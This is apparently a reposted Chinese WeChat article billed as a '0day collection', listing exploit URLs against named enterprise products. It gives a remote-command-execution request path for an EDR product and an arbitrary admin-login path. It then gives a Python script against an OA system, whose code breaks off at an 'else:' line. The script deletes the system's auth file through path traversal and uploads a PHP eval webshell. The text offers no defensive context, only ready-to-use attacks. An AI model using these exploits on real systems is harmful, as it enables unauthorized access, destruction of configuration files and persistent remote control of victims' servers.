互联网爆料:
sxf-edr
rce:
/tool/log/c.php?strip_slashes=system&host=id
任意用户登录:
/ui/login.php?user=admin
trx-未授权+越权
target="http://127.0.0.1:1234/"
payload="<?php eval($_POST['1234']);?>"
print("[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OA")
input("Press enter to continue")
print("[*]Deleting auth.inc.php....")
url=target+"/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php"
requests.get(url=url)
print("[*]Checking if file deleted...")
url=target+"/inc/auth.inc.php"
page=requests.get(url=url).text
if 'No input file specified.' not in page:
print("[-]Failed to deleted auth.inc.php")
exit(-1)
print("[+]Successfully deleted auth.inc.php!")
print("[*]Uploading payload...")
url=target+"/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./"
files = {'FILE1': ('deconf.php', payload)}
requests.post(url=url,files=files)
url=target+"/_deconf.php"
page=requests.get(url=url).text
if 'No input file specified.' not in page:
print("[+]Filed Uploaded Successfully")
print("[+]URL:",url)
else:
本文始发于微信公众号(Khan安全攻防实验室):sxf、trx、td(0day集合)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论